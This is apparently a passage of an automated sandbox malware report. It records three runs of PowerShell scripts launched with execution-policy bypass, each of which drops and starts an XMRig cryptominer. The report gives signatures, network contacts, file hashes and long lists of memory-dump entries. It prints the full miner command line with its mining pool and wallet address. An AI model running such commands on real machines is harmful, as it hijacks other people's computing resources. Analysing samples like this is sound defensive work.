memory/2548-114-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-115-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

memory/2548-116-0x00007FF681770000-0x00007FF6823A3000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:44

Platform

win11-20240508-en

Max time kernel

1797s

Max time network

1755s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp

Files

memory/404-0-0x00007FFA49283000-0x00007FFA49285000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwnyjvf1.sow.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/404-9-0x0000021424050000-0x0000021424072000-memory.dmp

memory/404-10-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

memory/404-11-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

memory/404-12-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

memory/404-14-0x00000214240E0000-0x00000214240F2000-memory.dmp

memory/404-15-0x00000214240D0000-0x00000214240DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4260-46-0x0000023E878D0000-0x0000023E878F0000-memory.dmp

memory/4260-47-0x0000023F1B640000-0x0000023F1B660000-memory.dmp

memory/404-48-0x00007FFA49283000-0x00007FFA49285000-memory.dmp

memory/404-49-0x00007FFA49280000-0x00007FFA49D42000-memory.dmp

memory/4260-50-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-51-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-53-0x0000023F1BCA0000-0x0000023F1BCC0000-memory.dmp

memory/4260-52-0x0000023F1BCC0000-0x0000023F1BCE0000-memory.dmp

memory/4260-54-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-55-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-56-0x0000023F1BCC0000-0x0000023F1BCE0000-memory.dmp

memory/4260-57-0x0000023F1BCA0000-0x0000023F1BCC0000-memory.dmp

memory/4260-58-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-59-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-60-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-61-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-62-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-63-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-64-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-65-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-66-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-67-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-68-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-69-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-70-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-71-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-72-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-73-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-74-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-75-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-76-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-77-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-78-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-79-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-80-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-81-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-82-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-83-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-84-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-85-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-86-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-87-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-88-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-89-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-90-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-91-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-92-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-93-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-94-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-95-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-96-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-97-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-98-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-99-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-100-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-101-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-102-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-103-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-104-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-105-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-106-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-107-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-108-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-109-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-110-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-111-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-112-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-113-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-114-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-115-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

memory/4260-116-0x00007FF6EF4D0000-0x00007FF6F0103000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:47

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/2424-2-0x00007FFFE5D63000-0x00007FFFE5D64000-memory.dmp

memory/2424-5-0x000001D299DF0000-0x000001D299E12000-memory.dmp

memory/2424-8-0x00007FFFE5D60000-0x00007FFFE674C000-memory.dmp

memory/2424-9-0x000001D299FB0000-0x000001D29A026000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v0opwm1v.pts.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2424-10-0x00007FFFE5D60000-0x00007FFFE674C000-memory.dmp

memory/2424-25-0x00007FFFE5D60000-0x00007FFFE674C000-memory.dmp

memory/2424-61-0x000001D299F90000-0x000001D299F9A000-memory.dmp

memory/2424-48-0x000001D29A130000-0x000001D29A142000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3392-90-0x0000022809E60000-0x0000022809E80000-memory.dmp

memory/2424-91-0x00007FFFE5D63000-0x00007FFFE5D64000-memory.dmp

memory/2424-93-0x00007FFFE5D60000-0x00007FFFE674C000-memory.dmp

memory/3392-92-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/2424-94-0x00007FFFE5D60000-0x00007FFFE674C000-memory.dmp

memory/3392-95-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-96-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-97-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-98-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-99-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-100-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-101-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-102-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-103-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-104-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-105-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-106-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-107-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-108-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-109-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-110-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-111-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-112-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-113-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-114-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-115-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-116-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-117-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-118-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-119-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-120-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-121-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-122-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-123-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-124-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-125-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-126-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-127-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-128-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-129-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-130-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-131-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-132-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-133-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-134-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-135-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-136-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-137-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-138-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-139-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-140-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-141-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-142-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-143-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-144-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-145-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-146-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-147-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-148-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-149-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-150-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-151-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-152-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-153-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-154-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-155-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

memory/3392-156-0x00007FF7D2990000-0x00007FF7D35C3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.161:443 www.bing.com tcp
US 8.8.8.8:53 161.61.62.23.in-addr.arpa udp
NL 23.62.61.161:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

memory/5060-0-0x00007FF8CEBF3000-0x00007FF8CEBF5000-memory.dmp

memory/5060-1-0x000002AC69CB0000-0x000002AC69CD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqc2eoex.auf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5060-11-0x00007FF8CEBF0000-0x00007FF8CF6B1000-memory.dmp

memory/5060-12-0x00007FF8CEBF0000-0x00007FF8CF6B1000-memory.dmp

memory/5060-14-0x00007FF8CEBF0000-0x00007FF8CF6B1000-memory.dmp

memory/5060-15-0x000002AC6A730000-0x000002AC6A742000-memory.dmp

memory/5060-16-0x000002AC6A710000-0x000002AC6A71A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
